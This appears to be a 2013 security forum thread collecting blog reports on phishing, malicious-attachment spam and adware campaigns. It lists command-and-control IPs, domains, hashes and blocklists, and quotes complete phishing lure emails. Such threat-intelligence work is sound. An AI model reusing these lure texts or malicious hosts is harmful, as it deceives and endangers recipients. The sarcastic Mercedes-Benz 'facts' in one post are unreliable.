The email originates from 66.160.250.236 [mail.andrustrucking .com] which is a trucking company called Doug Andrus Distributing... perhaps they have had their email system compromised (maybe by someone using the same phishing technique)... the link in the email goes to a legitimate but -hacked- site and then lands on a phishing page hosted on [donotclick]www.cycook .com/zboard//microsoft-update/index.php.htm. Despite the email saying "Windows Update", the landing page has had Office branding crudely pasted into it.
Screenshot: https://lh3.ggpht.com/-iRzMFul5GSo/UmEvfhg7xYI/AAAAAAAACG8/Mz1-f0prhmE/s1600/msphish.png
Entering your credentials simply takes you to a genuine Microsoft page:
> https://lh3.ggpht.com/-1sopTIkGh-w/UmEwrqORkiI/AAAAAAAACHI/LDBANi89hG0/s1600/msphish2.png
Phishing isn't restricted to stuff like bank accounts, the spammers also like a fresh supply of email accounts to abuse, so as ever.. exercise caution."

Also see recent post: http://forums.spybot.info/showthread.php?66171-Fake-MS-updates&p=445961&viewfull=1#post445961

... and:
- https://isc.sans.edu/diary.html?storyid=16838
Last Updated: 2013-10-17 22:19:09 UTC
> https://isc.sans.edu/diaryimages/images/microsoft-phish.jpg
___

Rogue ads lead to toolbar PUA (Potentially Unwanted Application)
- http://www.webroot.com/blog/2013/10/18/rogue-ads-lead-mipony-download-accelerator-fun-moods-toolbar-pua-potentially-unwanted-application/
Oct 18, 2013 - "Potentially Unwanted Applications (PUAs) continue to visually social engineer users into installing virtually useless applications. They monetize each and every install by relying on ‘bundling’ which often comes in the form of a privacy-violating toolbar or third-party application. We recently intercepted a rogue ad that entices users into downloading the Mipony Download Accelerator that is bundled with the privacy-invading FunMoods toolbar PUA, an unnecessary bargain with the integrity and confidentiality of your PC.
Sample screenshot of the landing page:
> https://www.webroot.com/blog/wp-content/uploads/2013/10/Download_Accelerator_Mipony_InstallCore_PUA_FunMoods_Toolbar_Potentially_Unwanted_Application.png
Detection rate for the PUA: MD5: 023e625cbb1b30565d46f7533ddc03db * ... W32/InstallCore.R4.gen!Eldorado; Install Core Click run software.
Domain name reconnaissance: ultimatedownloadaccelerator .com – 50.19.220.248; 174.129.22.118; 23.21.144.61; 23.23.144.245
Upon execution, it phones back to:
cdneu.ultimatedownloadaccelerator .com – 65.254.40.36
os-test.ultimatedownloadaccelerator .com – 54.244.230.64
cdnus.ultimatedownloadaccelerator .com – 199.58.87.155
img.ultimatedownloadaccelerator .com – 199.58.87.155...
> https://www.webroot.com/blog/wp-content/uploads/2013/10/Download_Accelerator_Mipony_InstallCore_PUA_FunMoods_Toolbar_Potentially_Unwanted_Application_01.png
Detection rate for the FunMoods Toolbar: MD5: 592f35f9954a7ec4c0b4985857f81ad8 ** Win32/InstallCore; PUP.Optional.Funmoods
Once executed, it phones back to:
os.funmoodscdn .com 54.245.235.34
cdneu.funmoodscdn .com 146.185.27.53
cdnus.funmoodscdn .com 199.58.87.155 ...
Despite the fact that most modern day PUAs include uninstall instructions, our advice is to -not- install them in the first place, instead, seek a legitimate — often free but this time fully featured and working — alternative to their pseudo-unique value propositions..."
* https://www.virustotal.com/en/file/3096843008cc4c9363b1e96ccc4618bfc190455fc9266e1740ee1bad528ec71a/analysis/1381837813/

** https://www.virustotal.com/en/file/be4283edf1d9be7d7ab4e6e57e7c7e8737585be85a62d427f4965e417af3dd14/analysis/1381929038/

- https://www.virustotal.com/en/ip-address/199.58.87.155/information/

- https://www.virustotal.com/en/ip-address/146.185.27.53/information/

- https://www.virustotal.com/en/ip-address/54.245.235.34/information/

- https://www.virustotal.com/en/ip-address/54.244.230.64/information/

- https://www.virustotal.com/en/ip-address/65.254.40.36/information/

- https://www.virustotal.com/en/ip-address/50.19.220.248/information/

- https://www.virustotal.com/en/ip-address/174.129.22.118/information/

- https://www.virustotal.com/en/ip-address/23.21.144.61/information/

- https://www.virustotal.com/en/ip-address/23.23.144.245/information/
___

Fake Avaya "Voice Mail Message" SPAM - malicious payload
- http://blog.dynamoo.com/2013/10/avaya-voice-mail-message-spam-with.html
18 Oct 2013 - "This fake voice mail message appears to originate from within the victim's own domain (although that is just a forgery):
Date: Fri, 18 Oct 2013 09:19:42 -0600 [11:19:42 EDT]
From: Voice Mail Message [1c095eb9-fa18-74e5-b@victimdomain.com]
Subject: Voice Mail Message ( 45 seconds )
This voice message was created by Avaya Modular Messaging. To listen to this voice
message,just open it.

Attached is a file VoiceATT0685424.zip which in turn contains a malicious executable VoiceMessageTT.exe with an icon to make it look like an audio file. This trick can work if users have decided to hide the extensions of files in Windows, a stupid default setting that has no doubt infected millions of Windows users over the years.
Screenshot: https://lh3.ggpht.com/-S_u-eR8Vy9I/UmFlmRsohDI/AAAAAAAACHY/9ymnNl5QrZg/s1600/voicemessage.png
Of course, the .exe file is malware with a pretty low detection rate of just 3/48* at VirusTotal. Automated analysis... shows a connection to a domain called adamdevarney .com on 209.236.71.58 (Westhost, US) which has been seen twice before**. This means that there are potentially hundreds of compromised domains on the same server, blocking traffic to the IP address will be the most effective way of giving yourself some protection."
* https://www.virustotal.com/en/file/8a9656fec2d39d44e8656b961d568350df042fdded242d31c2af08b673301abb/analysis/1382114301/
File name: VoiceMessageTT.exe
Detection ratio: 3/48

** http://blog.dynamoo.com/2013/10/scan-from-xerox-workcentre-spam.html

** http://blog.dynamoo.com/2013/10/linkedin-spam-contractagreementwhatever.html

- https://www.virustotal.com/en/ip-address/209.236.71.58/information/
___

Fake Dropbox SPAM - dynamooblog .ru
- http://blog.dynamoo.com/2013/10/dropbox-spam-leads-to-malware-on-errr.html
18 Oct 2013 - "Two days ago I wrote about the apparent return of the RU:8080.. it appears that in order to celebrate their return, they've acknowledged my acknowledgement in the form of a malware landing page of dynamooblog .ru... this is the latest spam email purportedly from Dropbox, and using the same template as used in this ThreeScripts spam run*.
Screenshot: https://lh3.ggpht.com/-E-4Jwel4IN8/UmGl0a0kqII/AAAAAAAACHs/hgBHVc4h6yg/s1600/dropbox2.png
The attack and payload is exactly the same as this one**, and the executable is unchanged but now has a better VirusTotal detection rate of 29/48***. The domain dynamooblog .ru was registered yesterday to the infamous Russian "Private Person" and is hosted on a lot of IPs that have been serving up Zbot for some time... this is my recommended blocklist:
dynamooblog .ru, 12.46.52.147, 41.203.18.120, 62.76.42.58, 69.46.253.241, 70.159.17.146, 91.205.17.80, 94.102.14.239, 111.68.229.205, 114.32.54.164, 118.163.216.107, 140.174.98.150, 163.18.62.51, 182.237.17.180, 202.6.120.103, 203.80.16.81, 203.114.112.156, 210.56.23.100, 210.166.209.15, 212.154.192.122, 213.5.182.144, 213.143.121.133, 213.214.74.5 "
* http://blog.dynamoo.com/2013/10/fake-dropbox-spam-leads-to-malware-on.html

** http://blog.dynamoo.com/2013/10/your-facebook-friend-andrew-hernandez.html

*** https://www.virustotal.com/en/file/807f43d9649976a3ac7bc4b2506947ccedea2235eb80ac69a8246fb2b8c1a1b4/analysis/1382130555/
File name: ieupdate.exe
Detection ratio: 29/48

:mad: :fear:

AplusWebMaster
2013-10-21, 19:16
FYI...

Fake billing SPAM - Remit_10212013.exe
- http://blog.dynamoo.com/2013/10/last-month-remit-spam-remit10212013.html
21 Oct 2013 - "This -bogus- remittance spam comes with a malicious attachment:
Date: Mon, 21 Oct 2013 15:08:15 +0100 [10:08:15 EDT]
From: Administrator [docs9@ victimdomain]
Subject: FW: Last Month Remit
File Validity: 21/10/2013
Company : http ://[victimdomain
File Format: Office - Excel
Internal Name: Remit File
Legal Copyright: Microsoft Corporation. All rights reserved.
Original Filename: Last month remit file.xls ...

Screenshot: https://lh3.ggpht.com/-9V_pNykJ8sY/UmU-MFH_t5I/AAAAAAAACIA/tsWBG4K21o4/s1600/remit.png

The email appears to originate from the victim's own domain, and mentions that domain in the body of the text. The attachment also contains the victims domain in the format Remit_domain.tld.zip which in turn contains a malicious executable with an icon designed to look like a Microsoft Excel file, in this case it is called Remit_10212013.exe but note that the date is encoded into the filename. The malicious payload has a very low detection rate at VirusTotal of just 2/47*. Automated analysis tools... show an attempted connection to p3-sports .com on 192.232.198.101 (Websitewelcome, US). There may be other infected domains on the same IP if previous patterns are repeated. Also, the malware appears to try to connect to the following IPs** demonstrating a peer-to-peer capability."
* https://www.virustotal.com/en-gb/file/ba281955fe4332c18f4a5981160cca4973edbfde28c14a7b54e7b2d8dbbcb5fc/analysis/1382365823/

** https://malwr.com/analysis/YzVmYzljOTQwYTdjNDI0OWI3OWYxNGVhNzQzMzBiYzQ/

:fear: :mad:

AplusWebMaster
2013-10-22, 13:51
FYI...

Rogue ads lead to the ‘EzDownloaderpro’ PUA (Potentially Unwanted Application)
- http://www.webroot.com/blog/2013/10/22/rogue-ads-lead-ezdownloaderpro-pua-potentially-unwanted-application/
Oct 22, 2013 - "We’ve just intercepted yet another rogue ad campaign, attempting to trick users into installing the EzDownloaderpro PUA (Potentially Unwanted Application). Primarily relying on catchy “Play Now, Download Now” banners, the visual social engineering tactic of this campaign is similar to other PUA related campaigns we’ve previously profiled...
Sample screenshot of the landing page:
> https://www.webroot.com/blog/wp-content/uploads/2013/10/EzDownloadpro_PUA_Potentially_Unwanted_Application_Rogue_Ad_Privacy-1024x490.png
Landing URL: lp.ezdownloadpro .info/sspcQA/ssa/ – 46.165.228.246
Domain name reconnaissance of the redirectors:
superfilesdocumentsy .asia/v944/?a=1 – 141.101.117.252; 141.101.116.252
applicationscenterforally .asia/v944/?INm – 108.162.197.34; 108.162.196.34
op.applicationscenterforally .asia/sspcQA/ssa/ ...
The following MD5 is also known to have been downloaded from the same IP (108.162.197.34):
MD5: bc44e23e46fa4c3e73413c130d4f2018 *
Detection rate for the sample ‘pushed’ by the rogue Download page: MD5: e8c9c2db3514f375f74b60cb9dfcd4ef ** PUP.Optional.InstalleRex; Installerex/WebPick (fs)
Once executed, the sample phones back to:
r1.stylezip .info – 198.7.61.118
c1.stylezip .info – 198.7.61.118
i1.stylezip .info – 198.7.61.118
... Detection rate for the original EzDownloadpro executable: MD5: 292b53b745e3fc4af79924a3c11fcff0 *** Win32:InstalleRex-U [PUP]; MalSign.Skodna.Pick; PUP.Optional.EZDownloader.A
Sample screenshot of EzDownloadpro’s official Web site:
> https://www.webroot.com/blog/wp-content/uploads/2013/10/EzDownloadpro_PUA_Potentially_Unwanted_Application_Rogue_Ad_Privacy_01.png
Unique PUA MD5s served based on multiple requests to the same URL (applicationscenterforally .asia/v944/?INm)..."
(More detail at the webroot URL.)

* https://www.virustotal.com/en/file/9b5d1ddabc8d19246443e5afd73e95a9c34d3ffadb1f55d624488ba5bcb18cdc/analysis/

** https://www.virustotal.com/en/file/66f660ef7c260b1a9da9be0466882043efc01b86de44a6baf849e49c66893237/analysis/1381845366/

*** https://www.virustotal.com/en/file/be42dcbc7c8bad64854a93ba9b853c6492a6405ab0324fd42429908d09fc9589/analysis/

- https://www.virustotal.com/en/ip-address/46.165.228.246/information/

- https://www.virustotal.com/en/ip-address/141.101.116.252/information/

- https://www.virustotal.com/en/ip-address/141.101.117.252/information/

- https://www.virustotal.com/en/ip-address/108.162.196.34/information/

- https://www.virustotal.com/en/ip-address/108.162.197.34/information/

- https://www.virustotal.com/en/ip-address/198.7.61.118/information/
___

Fake ADP SPAM / abrakandabr .ru
- http://blog.dynamoo.com/2013/10/adp-spam-abrakandabrru.html
22 Oct 2013 - "This fake ADP spam leads to malware on abrakandabr .ru:
From: ClientService@ adp .com [ClientService@ adp .com]
Date: 22 October 2013 18:04
Subject: ADP RUN: Account Charge Alert
ADP Urgent Communication
Note ID: 33400
October, 22 2013
Valued ADP Partner
Account operator with ID 58941 Refused Yesterday Payroll Operation from your ADP account recently. Report(s) have been uploaded to the website:
Sign In here
Please see the following notes:
• Please note that your bank account will be debited within 1 banking day for the total shown on the Summary(s)...

Screenshot: https://lh3.ggpht.com/-kuQevnVKmHA/Uma1nwWs78I/AAAAAAAACIU/rRK4oYQnzDU/s1600/adp-spam3.png

The link goes through a legitimate hacked site and then onto a malware landing page at [donotclick]abrakandabr .ru:8080/adp.report.php (if running Windows, else they get sent to adp .com). This is hosted on quite a lot of IP addresses:
69.46.253.241 (RapidDSL & Wireless, US)
91.205.17.80 (TOV Adamant-Bild, Ukraine)
111.68.229.205 (NTT Communications, Japan)
114.32.54.164 (Chunghwa Telecom, Taiwan)
118.163.216.107 (Chunghwa Telecom, Taiwan)
163.18.62.51 (TANET, Taiwan)
202.6.120.103 (TSKL, Kiribati)
203.80.16.81 (MYREN, Malaysia)
203.114.112.156(PhetchaboonHospital, Thailand)
210.56.23.100 (Commission For Science And Technology, Pakistan)
210.166.209.15 (Prox Communicator, Japan)
212.154.192.122 (Hoster.KZ, Kazakhstan)
213.214.74.5 (BBC Cable, Bulgaria)
As mentioned before, this is either the return of the infamous RU:8080 gang, or it is somebody -pretending- to be the gang. But one rather peculiar factor is that in this case the bad guys only seem to have a small pool of servers that have been compromised for some time, and don't seem to have added any news ones.
Recommended blocklist:
69.46.253.241
91.205.17.80
111.68.229.205
114.32.54.164
118.163.216.107
163.18.62.51
202.6.120.103
203.80.16.81
203.114.112.156
210.56.23.100
210.166.209.15
212.154.192.122
213.214.74.5
abrakandabr .ru
dynamooblog .ru
inkrediblehalk .ru
intro2seo .ru
hankoksuper .ru "

- http://threattrack.tumblr.com/post/64787914171/adp-invoice-spam
Oct 22, 2013 - "Subjects Seen:
Payroll Invoice
Typical e-mail details:
A copy of your ADP TotalSource Payroll Invoice for the following payroll is is attached in PDF file and available for viewing.
Year: 13
Week No: 08
Payroll No: 1

Malicious File Name and MD5:
invoice.zip (5B9EABC34B1A326F6491613E9FD6AAFD)
invoice_<random>.pdf.exe
(12C700409E6DB4A6E043BD3BBD3A1A21)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/c50b35a4e0ca49843f16c4932723d3d0/tumblr_inline_mv30siC2sP1r6pupn.png
___

Fake Xerox WorkCentre emails lead to malware
- http://www.webroot.com/blog/2013/10/22/fake-scanned-image-xerox-workcentre-themed-emails-lead-malware/
Oct 22, 2013 - "We’ve intercepted a currently circulating malicious spam campaign, tricking users into thinking that they’ve received a scanned document sent from a Xerox WorkCentre Pro device. In reality, once users execute the malicious attachment, the cybercriminal(s) behind the campaign gain complete control over the now infected host.
Sample screenshots of the spamvertised malicious email:
> https://www.webroot.com/blog/wp-content/uploads/2013/10/Email_Spam_Malicious_Fake_Social_Engineering_Malware_Malicious_Software_Xerox_WorkCentre_Pro.png
Detection rate for the malicious attachment: MD5: 1a339ecfac8d2446e2f9c7e7ff639c56 * ... TROJ_UPATRE.AX; Heuristic.LooksLike.Win32.SuspiciousPE.J!89... phones back to:
smclan .com – 209.236.71.58 ... malicious domains are also currently responding to the same IP ..."
* https://www.virustotal.com/en/file/b1769b5b65c3c93c1fd6f17380dc23678af1033ed2b51a6d876bdc9867d279f0/analysis/

- https://www.virustotal.com/en/ip-address/209.236.71.58/information/

:mad: :mad:

AplusWebMaster
2013-10-23, 17:58
FYI...

Fake Voice msg. SPAM / VoiceMessage .exe
- http://blog.dynamoo.com/2013/10/voice-message-from-unknown-spam.html
23 Oct 2013 - "These bogus voice message spams have a malicious attachment:
Date: Wed, 23 Oct 2013 19:17:42 +0530 [09:47:42 EDT]
From: Administrator [voice8@ victimdomain]
Subject: Voice Message from Unknown (553-843-8846)
- - -Original Message- - -
From: 553-843-8846
Sent: Wed, 23 Oct 2013 19:17:42 +0530
To: [recipient list at victimdomain]
Subject: Important: to all Employee
- -
Date: Wed, 23 Oct 2013 08:36:24 -0500 [09:36:24 EDT]
From: Administrator [voice3@ victimdomain]
Subject: Voice Message from Unknown (586-898-9333)
- - -Original Message- - -
From: 586-898-9333
Sent: Wed, 23 Oct 2013 08:36:24 -0500
To: [recipient list at victimdomain]
Subject: Employees Only ...

In each case there is an attachment VoiceMessage.zip which in turn contains an executable VoiceMessage.exe with an icon to make it look like an audio file.
> https://lh3.ggpht.com/-xjhFKIS98do/UmfX0oudikI/AAAAAAAACIk/HP043i6x5_Q/s1600/voicemessage.png
Obviously this is malicious, and the detection rate at VirusTotal is a pretty poor 5/46*. Automated analysis... shows an attempted connection to glyphs-design .com on 212.199.115.173 (012 Smile Communications Ltd, Israel). Blocking that domain is probably prudent, however there are several hundred legitimate domains on the same server, so bear that in mind if you choose to block it."
* https://www.virustotal.com/en-gb/file/4d1f10d965fb352617ed1e33491f74d2519304bbc97916e18a014d4481c29f65/analysis/1382536265/
File name: VoiceMessage.exe
Detection ratio: 5/47

- https://www.virustotal.com/en-gb/ip-address/212.199.115.173/information/

- http://threattrack.tumblr.com/post/64865370226/voice-message-spam
Oct 23, 2013 - "Subjects Seen:
Voice Message from Unknown (389-353-7349)
Typical e-mail details:
- - -Original Message- - -
From: 389-353-7349
Sent: Wed, 23 Oct 2013 08:52:48 -0500
To: <e-mail addresses>
Subject: Important: to all Employees

Malicious File Name and MD5:
VoiceMessage.zip (D33AF1A7B51CFA41EAAB6292E0F6EBBE)
VoiceMessage.exe
(535109E4902D32BB6F11F7235FCEC6C4)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/c93f93751266d3c4f4d55cdb835be450/tumblr_inline_mv4kshNZfU1r6pupn.png

:fear: :sad: :mad:

AplusWebMaster
2013-10-24, 18:50
FYI...

Fake resume SPAM / Resume_LinkedIn.exe
- http://blog.dynamoo.com/2013/10/my-resume-spam-resumelinkedinexe.html
24 Oct 2013 - "This rather terse spam email message has a malicious attachment:
Date: Thu, 24 Oct 2013 15:45:37 +0200 [09:45:37 EDT]
From: Elijah Parr [Elijah.Parr@ linkedin .com]
Subject: My resume
Attached is my resume, let me know if its ok.
Thanks,
Elijah Parr
------------------------
Date: Thu, 24 Oct 2013 19:14:37 +0530 [09:44:37 EDT]
From: Greg Barnes [Greg.Barnes@ linkedin .com]
Subject: My resume
Attached is my resume, let me know if its ok.
Thanks,
Greg Barnes

The attachment is Resume_LinkedIn.zip which in turn contains a malicious executable Resume_LinkedIn.exe with an icon to make it look like a Word Document rather than an executable. VirusTotal is timing out at the moment, but earlier only one AV engine detected it (Norman). Automated analysis tools... show an attempted connection to homevisitor .co .uk on 64.50.166.122 (Lunarpages, US). This server was distributing malware last month too, so we must assume that it is compromised. Blocking that IP address would probably be a good idea as there are several other compromised domains on that same server [1]* [2]**."
* https://www.virustotal.com/en-gb/ip-address/64.50.166.122/information/

** http://urlquery.net/search.php?q=64.50.166.122&type=string&start=2013-10-09&end=2013-10-24&max=50

- http://threattrack.tumblr.com/post/64955364250/linkedin-resume-spam
Oct 24, 2013 - "Subjects Seen:
My resume
Typical e-mail details:
Attached is my resume, let me know if its ok.
Thanks,
Mike Whalen

Malicious File Name and MD5:
Resume_LinkedIn.zip (AF04ED38D97867F8E773B6AFC14ED9F0)
Resume_LinkedIn.exe
(62F4A3DFE059E9030E2450D608C82899)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/241debf2f886a3945d47d6bc1e3e3347/tumblr_inline_mv6facqrta1r6pupn.png
___

Fake Company Reports emails lead to malware ...
- http://www.webroot.com/blog/2013/10/24/fake-important-company-reports-themed-emails-lead-malware/
Oct 24, 2013 - "A currently ongoing malicious spam campaign is attempting to trick users into thinking that they’ve received a legitimate Excel ‘Company Reports’ themed file. In reality through, once socially engineered users execute the malicious attachment on their PCs, it automatically opens a backdoor allowing the cybercriminals behind the campaign to gain complete access to their host, potentially abusing it a variety of fraudulent ways.
Sample screenshots of the spamvertised email:
> https://www.webroot.com/blog/wp-content/uploads/2013/10/Fake_Malicious_Rogue_Email_Spam_Spamvertised_Malware_Malicious_Software_Social_Engineering_Botnet_Company_Reports.png
Detection rate for the spamvertised attachment: MD5: 5138b3b410a1da4cbc3fcc2d9c223584 * ... Trojan.Win32.Agent.aclil; TSPY_ZBOT.EH ... The sample then phones back to det0nator.com – 38.102.226.14 on port 443, as well as to... C&C servers (-many- listed at the webroot URL above)... MD5s are known to have phoned back to the same IP (38.102.226.14)... MD5s known to have phoned back to the same C&C servers over the last couple of days..."
* https://www.virustotal.com/en/file/7ae17affe0c3c2bf997405e96e7cc2d42363bc7e945633cdc2be9d0cd169360f/analysis/
File name: Company_Report_10222013.exe
Detection ratio: 28/44

- https://www.virustotal.com/en/ip-address/38.102.226.14/information/
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Faxed Document Delivery Email Messages - 2013 Oct 24
Fake Payroll Report Email Messages - 2013 Oct 24
Email Messages with Malicious Attachments - 2013 Oct 24
Fake UPS Payment Document Attachment Email Messages - 2013 Oct 24
Fake Financial Account Statement Email Messages - 2013 Oct 24
Email Messages with Malicious Attachments - 2013 Oct 24
Fake Bank Payment Transfer Notification Email Messages - 2013 Oct 24
Fake Invoice Statement Attachment Email Messages - 2013 Oct 24
Fake Payroll Invoice Notification Email Messages - 2013 Oct 24
Fake Product Purchase Order Email Messages - 2013 Oct 24
Fake Payment Confirmation Notification Email Messages - 2013 Oct 24
Malicious Personal Pictures Attachment Email Messages - 2013 Oct 24
Fake Resume Delivery Email Messages - 2013 Oct 24
Email Messages with Malicious Attachments - 2013 Oct 24
Fake Product Quote Request Email Messages - 2013 Oct 24
Email Messages with Malicious Attachments - 2013 Oct 24
Fake Money Transfer Notification Email Messages - 2013 Oct 23
Fake Xerox Scanned Attachment Email Messages - 2013 Oct 23
(More detail and links at the cisco URL above.)

:mad: :fear:

AplusWebMaster
2013-10-25, 14:06
FYI...

Survey Scams - Halloween freebies ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/halloween-freebies-lead-to-ghastly-survey-scams/
Oct 24, 2013 - "... scams we saw used free Halloween products as bait. Searching for the phrase “Halloween GET FREE” leads to a suspicious YouTube video:
Suspicious YouTube video
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/10/halloween-youtube1.jpg
The URL advertised on the video’s page leads users to a scam site that asks for your personal information, including your email address.
Survey site
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/10/halloween-youtube2.jpg
Survey scam
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/10/halloween-youtube3.jpg
Using similar keywords on Twitter yielded two suspicious accounts. Each account had a Halloween-themed Twitter handle, perhaps to entice users into checking out the accounts.
Two suspicious Twitter accounts
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/10/halloween-twitter11.jpg
Each account advertises free Halloween candy with a corresponding URL to get the said candy. The advertised website leads users to survey scams, rather than candy. Facebook also became home to a Halloween-themed survey scam. We spotted a Facebook page that advertises free Halloween candy, like the scam on Twitter. To get the candy, users are supposed to click a link on the page.
Website advertising free candy
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/10/halloween-facebook1.jpg
But much like the other scams, this simply leads to a survey site. It’s interesting to note that users are directed to the page used in the YouTube scam mentioned earlier. To further entice users, the site promises Apple products in exchange for finishing the survey.
Apple products as “reward” for completed surveys
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/10/halloween-facebook3.jpg
It might be tempting to get free stuff online, but users should always be cautious when encountering these types of promos or deals. Cybercriminals are willing to promise anything and everything just to get what they want. When encountering deals that are too good to be true, users should err on the side of caution and assume that they are..."
* http://blog.trendmicro.com/trendlabs-security-intelligence/tricks-and-threats-infographic/
"... Oct 29, 2011... filed under Bad Sites"
___

Fake Lloyds SPAM - Lloyds TSB msg...
- http://blog.dynamoo.com/2013/10/you-have-received-new-debit-lloyds-tsb.html
25 Oct 2013 - "This fake Lloyds TSB message has a malicious attachment:
Date: Fri, 25 Oct 2013 13:55:41 +0200 [07:55:41 EDT]
From: LloydsTSB [noreply@ lloydstsb .co .uk]
Subject: You have received a new debit
Priority: High Priority 1 (High)
This is an automatically generated email by the Lloyds TSB PLC LloydsLink online payments Service.
The details of the payment are attached...

Attached is a zip file in the format Report_recipientname.zip which in turn contains a malicious executable Report_10252013.exe (note the date is encoded into the filename). The file has an icon to make it look like a PDF file, but it isn't. The VirusTotal detection rate is a so-so 13/47*. Automated analysis... shows an attempted connection to www .baufie .com on 173.203.199.241 (Rackspace, US). Often these callbacks indicate a completely compromised server, so it may be possible that there are other sites being abused on the same box."
* https://www.virustotal.com/en-gb/file/27dd3808d50bc690e155b2687fe0e67083882f1d9493437343e27255ccd95ad4/analysis/1382702941/

- https://www.virustotal.com/en/ip-address/173.203.199.241/information/

:mad: :fear::fear:

AplusWebMaster
2013-10-28, 01:55
FYI...

Fake "You're a Mercedes-Benz winner!" SPAM
- http://blog.dynamoo.com/2013/10/you-are-mercedes-benz-winner-spam.html
27 Oct 2013 - "This is a slightly novel twist on an advanced fee fraud scam:
From: Mercedes-Benz [desk_notification@ yahoo .com]
Reply-To: bmlot20137@ live .com
Date: 27 October 2013 13:44
Subject: You are a Mercedes-Benz winner !!!
Dear Recipient,
You have received a loyalty reward from Mercedes-Benz, Answer the Below question correctly and stand a chance of winning our Promotional Award Grand prize of $4,000,000USD and a Brand New 2013 Mercedes-Benz GLK350 4Matic SUV Car. If you have never had a Mercedes-Benz Product, this is your chance to benefit from our company while if you have any of our products this is your opportunity of enjoying some of our benefits apart from the comfortability and efficiency of our products. Just answer the questions asked below and you could be a winner...
Our aims to support the abilities of the neediest groups to fulfill human dignity and social justice in cooperation with development partners in the world.
Kind Regards,
Mrs.Katherine Dooley
Mercedes-Benz,Online coordinator

The email was sent to a spamtrap address from 41.138.182.219 which is in Lagos, Nigeria via a mail server in the US at 65.40.236.192 (Embarq). You might wonder what the scam is because it looks like a competition.. once you have answered the three trivially easy questions (we all know that Mercedes Benz was founded by Terry Benz in 1946 and is headquartered in the UK, after all) then you will find that you'll need to pay a stiff fee to get your prize.. which will never materialise."
Labels: 419, Advanced Fee Fraud, Scam, Spam

:fear: :mad:

AplusWebMaster
2013-10-28, 13:01
FYI...

Fake WhatsApp Voice msg. emails lead to malware
- http://www.webroot.com/blog/2013/10/28/fake-whatsapp-voice-message-notification1-new-voicemail-themed-emails-lead-malware-2/
Oct 28, 2013 - "... The cybercriminal(s) behind the most recently profiled campaigns impersonating T-Mobile, and Sky, have just launched yet another malicious spam campaign, this time targeting WhatsApp users with fake “Voice Message Notification/1 New Voicemail” themed emails. Once unsuspecting users execute the fake voice mail attachment, their PCs will attempt to drop additional malware on the hosts...
Sample screenshot of the spamvertised email:
> https://www.webroot.com/blog/wp-content/uploads/2013/10/WhatsApp_Email_Spam_Malware_Malicious_Software_Social_Engineering_Cybercrime.png
Detection rate for the malicious attachment: MD5: 0458a01e42544eacf00e6f2b39b788e0 * ... Trojan.Win32.Sharik.qhd
... attempts to download additional malware from the well known C&C server at networksecurityx.hopto .org ..."
* https://www.virustotal.com/en/file/ad4b4fc2cf32922405fe7cd8eb252aa22607004b5c70ac5c8109ef314ad36964/analysis/
___

Fake AMEX "Fraud Alert" SPAM / steelhorsecomputers .net
- http://blog.dynamoo.com/2013/10/american-express-fraud-alert-spam.html
28 Oct 2013 - "This fake Amex spam leads to malware on steelhorsecomputers .net:
From: American Express [fraud@ aexp .com]
Date: 28 October 2013 14:14
Subject: Fraud Alert : Irregular Card Activity
Irregular Card Activity
Dear Customer,
We detected irregular card activity on your American Express
Check Card on 28th October, 2013.
As the Primary Contact, you must verify your account activity before you can
continue using your card, and upon verification, we will remove any restrictions
placed on your account.
To review your account as soon as possible please.
Please click on the link below to verify your information with us:
https ://www .americanexpress .com/
If you account information is not updated within 24 hours then your ability
to access your account will be restricted.
We appreciate your prompt attention to this important matter.
© 2013 American Express Company. All rights reserved.
AMEX Fraud Department

Screenshot: https://lh3.ggpht.com/-NyKdfJqQV8A/Um6McGvcPyI/AAAAAAAACLU/volqQqZZQw8/s1600/amex.png

The link in the email goes through a legitimate but -hacked- site and then runs of of the following three scripts:
[donotclick]kaindustries .comcastbiz .net/imaginable/emulsion.js
[donotclick]naturesfinest .eu/eroding/patricians.js
[donotclick]winklersmagicwarehouse .com/handmade/analects.js
From there, the victim is sent to a malware landing page at [donotclick]steelhorsecomputers .net/americanexpress/ which is a hijacked GoDaddy domain hosted on 96.126.102.8 (Linode, US). There are other hijacked GoDaddy domains too..."
Recommended blocklist:
96.126.102.8
8353333 .com ..."

- https://www.virustotal.com/en/ip-address/96.126.102.8/information/
___

Past Due Invoice Spam
- http://threattrack.tumblr.com/post/65351182223/past-due-invoice-spam
Oct 28, 2013 - "Subjects Seen:
Past Due Invoice
Typical e-mail details:
Your invoice is attached. Please remit payment at your earliest convenience.

Malicious File Name and MD5:
invoice_95836_10282013.zip (7CDBF5827161838D7C5BD0E5B98E01C1)
invoice_95836_10282013.exe (C277EA5A86F25AC0B704CAF5832FC614)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/ac231f1d8cd70361a9f185642dd14d83/tumblr_inline_mve559X8gD1r6pupn.png

:mad: :fear:

AplusWebMaster
2013-10-29, 19:02
FYI...

Fake Wells Fargo SPAM / Copy_10292013.zip
- http://blog.dynamoo.com/2013/10/wells-fargo-check-copy-spam.html
29 Oct 2013 - "These fake Wells Fargo spam messages have a malicious attachment:
Date: Tue, 29 Oct 2013 22:34:50 +0800 [10:34:50 EDT]
From: Wells Fargo [Emilio.Hendrix@ wellsfargo .com]
Subject: FW: Check copy
We had problems processing your latest check, attached is a image copy.
Emilio Hendrix
Wells Fargo Check Processing Services
817-576-4067 office
817-192-2390 cell Emilio.Hendrix@ wellsfargo .com
Wells Fargo Check Processing Services. 1 North Jefferson, St. Louis, MO 63103...
--------------------
Date: Tue, 29 Oct 2013 14:41:46 +0000 [10:41:46 EDT]
From: Wells Fargo [Leroy.Dale@ wellsfargo .com]
Subject: FW: Check copy
We had problems processing your latest check, attached is a image copy.
Leroy Dale
Wells Fargo Check Processing Services
817-480-3826 office
817-710-4624 cell Leroy.Dale@ wellsfargo .com
Wells Fargo Check Processing Services. 1 North Jefferson, St. Louis, MO 63103...

